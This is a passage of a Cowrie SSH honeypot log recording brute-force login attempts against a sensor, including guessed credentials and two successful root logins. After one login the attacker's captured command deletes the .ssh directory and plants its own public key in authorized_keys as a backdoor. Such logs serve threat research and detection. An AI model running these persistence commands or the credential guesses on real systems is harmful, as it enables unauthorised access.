es256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:14:29.903406Z","src_ip":"212.227.235.229","session":"f077ff38c570"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest2025","message":"login attempt [guest/guest2025] failed","sensor":"my-vps","timestamp":"2025-08-28T16:14:31.178861Z","src_ip":"212.227.235.229","session":"f077ff38c570"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:14:32.487564Z","src_ip":"212.227.235.229","session":"f077ff38c570"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59710,"dst_ip":"1.2.3.4","dst_port":22,"session":"620d1da4087e","protocol":"ssh","message":"New connection: 212.227.235.229:59710 (1.2.3.4:22) [session: 620d1da4087e]","sensor":"my-vps","timestamp":"2025-08-28T16:14:44.642238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:14:44.643224Z","src_ip":"212.227.235.229","session":"620d1da4087e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:14:44.857170Z","src_ip":"212.227.235.229","session":"620d1da4087e"}
{"eventid":"cowrie.login.failed","username":"certbot","password":"certbot","message":"login attempt [certbot/certbot] failed","sensor":"my-vps","timestamp":"2025-08-28T16:14:45.754837Z","src_ip":"212.227.235.229","session":"620d1da4087e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:14:46.970787Z","src_ip":"212.227.235.229","session":"620d1da4087e"}
{"eventid":"cowrie.session.connect","src_ip":"195.154.203.16","src_port":39444,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cb7f59bb16b","protocol":"ssh","message":"New connection: 195.154.203.16:39444 (1.2.3.4:22) [session: 4cb7f59bb16b]","sensor":"my-vps","timestamp":"2025-08-28T16:15:11.154881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:15:11.156690Z","src_ip":"195.154.203.16","session":"4cb7f59bb16b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57824,"dst_ip":"1.2.3.4","dst_port":22,"session":"af0fef0d5e93","protocol":"ssh","message":"New connection: 212.227.235.229:57824 (1.2.3.4:22) [session: af0fef0d5e93]","sensor":"my-vps","timestamp":"2025-08-28T16:15:18.946991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:15:18.947985Z","src_ip":"212.227.235.229","session":"af0fef0d5e93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:15:19.171286Z","src_ip":"212.227.235.229","session":"af0fef0d5e93"}
{"eventid":"cowrie.login.failed","username":"vijay","password":"vijay123","message":"login attempt [vijay/vijay123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:15:20.107432Z","src_ip":"212.227.235.229","session":"af0fef0d5e93"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:15:21.333265Z","src_ip":"212.227.235.229","session":"af0fef0d5e93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37468,"dst_ip":"1.2.3.4","dst_port":22,"session":"29f03845a409","protocol":"ssh","message":"New connection: 212.227.235.229:37468 (1.2.3.4:22) [session: 29f03845a409]","sensor":"my-vps","timestamp":"2025-08-28T16:15:50.814597Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:15:50.922825Z","src_ip":"212.227.235.229","session":"29f03845a409"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43808,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d7812a997f","protocol":"ssh","message":"New connection: 212.227.235.229:43808 (1.2.3.4:22) [session: f2d7812a997f]","sensor":"my-vps","timestamp":"2025-08-28T16:15:52.329482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:15:52.330873Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:15:52.645141Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56696,"dst_ip":"1.2.3.4","dst_port":22,"session":"8afc3c3b428b","protocol":"ssh","message":"New connection: 212.227.235.229:56696 (1.2.3.4:22) [session: 8afc3c3b428b]","sensor":"my-vps","timestamp":"2025-08-28T16:15:53.921370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:15:53.922178Z","src_ip":"212.227.235.229","session":"8afc3c3b428b"}
{"eventid":"cowrie.login.success","username":"root","password":"ABCabc123@","message":"login attempt [root/ABCabc123@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:15:53.941478Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:15:54.139470Z","src_ip":"212.227.235.229","session":"8afc3c3b428b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:15:54.588564Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:15:54.589359Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:15:54.590543Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:15:54.905441Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.login.failed","username":"dayz","password":"dayz","message":"login attempt [dayz/dayz] failed","sensor":"my-vps","timestamp":"2025-08-28T16:15:55.050643Z","src_ip":"212.227.235.229","session":"8afc3c3b428b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:15:55.982363Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:15:55.983056Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:15:56.269336Z","src_ip":"212.227.235.229","session":"8afc3c3b428b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:15:56.298567Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:15:56.299750Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43816,"dst_ip":"1.2.3.4","dst_port":22,"session":"89d2a189c73c","protocol":"ssh","message":"New connection: 212.227.235.229:43816 (1.2.3.4:22) [session: 89d2a189c73c]","sensor":"my-vps","timestamp":"2025-08-28T16:15:56.603434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:15:56.604550Z","src_ip":"212.227.235.229","session":"89d2a189c73c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:15:56.909570Z","src_ip":"212.227.235.229","session":"89d2a189c73c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:15:58.173758Z","src_ip":"212.227.235.229","session":"89d2a189c73c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:15:59.482099Z","src_ip":"212.227.235.229","session":"89d2a189c73c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46878,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5c196fa9408","protocol":"ssh","message":"New connection: 212.227.235.229:46878 (1.2.3.4:22) [session: f5c196fa9408]","sensor":"my-vps","timestamp":"2025-08-28T16:15:59.788312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:15:59.789397Z","src_ip":"212.227.235.229","session":"f5c196fa9408"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:16:00.100267Z","src_ip":"212.227.235.229","session":"f5c196fa9408"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:16:01.365882Z","src_ip":"212.227.235.229","session":"f5c196fa9408"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:16:01.676968Z","src_ip":"212.227.235.229","session":"f2d7812a997f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:16:01.678055Z","src_ip":"212.227.235.229","session":"f5c196fa9408"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59652,"dst_ip":"1.2.3.4","dst_port":22,"session":"9865eee81387","protocol":"ssh","message":"New connection: 212.227.125.160:59652 (1.2.3.4:22) [session: 9865eee81387]","sensor":"my-vps","timestamp":"2025-08-28T16:16:12.324052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:16:12.345155Z","src_ip":"212.227.125.160","session":"9865eee81387"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T16:16:12.397156Z","src_ip":"212.227.125.160","session":"9865eee81387"}
{"eventid":"cowrie.login.failed","username":"admin","password":"opnsense","message":"login attempt [admin/opnsense] failed","sensor":"my-vps","timestamp":"2025-08-28T16:16:12.547704Z","src_ip":"212.227.125.160","session":"9865eee81387"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:16:13.611165Z","src_ip":"212.227.125.160","session":"9865eee81387"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60460,"dst_ip":"1.2.3.4","dst_port":22,"session":"65c1736087dd","protocol":"ssh","message":"New connection: 212.227.235.229:60460 (1.2.3.4:22) [session: 65c1736087dd]","sensor":"my-vps","timestamp":"2025-08-28T16:16:31.408422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:16:31.409451Z","src_ip":"212.227.235.229","session":"65c1736087dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:16:31.634183Z","src_ip":"212.227.235.229","session":"65c1736087dd"}
{"eventid":"cowrie.login.failed","username":"tacuser","password":"acceler8","message":"login attempt [tacuser/acceler8] failed","sensor":"my-vps","timestamp":"2025-08-28T16:16:32.574265Z","src_ip":"212.227.235.229","session":"65c1736087dd"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:16:33.801544Z","src_ip":"212.227.235.229","session":"65c1736087dd"}
